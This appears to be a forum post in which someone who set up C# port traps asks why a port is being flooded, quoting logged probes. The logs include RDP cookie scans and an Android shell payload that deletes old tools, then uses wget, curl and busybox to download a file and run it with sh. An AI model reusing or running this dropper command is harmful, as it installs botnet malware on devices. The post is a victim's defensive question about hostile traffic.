Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts
Recently i wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server impl) on C# and found out that i'm getting requests from totally unknown dudes, such as this one:
FROM: [::ffff:]:52306
POST /cgi-bin/ViewLog.asp HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
Then, i decided to go further and made a mass port-trap from 90 to 10000 and i found that the most intensive one is the 568 port which stands as ms-shuttle/smb port. Here's some samples:
[25.11.2020 21:53:46]
FROM: [::ffff:]:55852
| UTF8:
&� Cookie: mstshash=hello
[25.11.2020 21:53:33]
FROM: [::ffff:]:64787 // <= this dude was spamming me for like 2-4 hrs
| UTF8:
*� Cookie: mstshash=Administr
[25.11.2020 16:07:01]
FROM: [::ffff:]:48964
| UTF8:
X � � ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget; sh wget; busybox wget; sh bwget; busybox curl > bcurl; sh bcurl; curl > curl; sh curl
I tried to search some info about this port + knock-knocks on it, but didn't succeeded. My log file size now exceeds 2 Mb so i wonder, why this is happening? Why this port is so actively being bombed? And, probably, what should i do to prevent receiving those requests?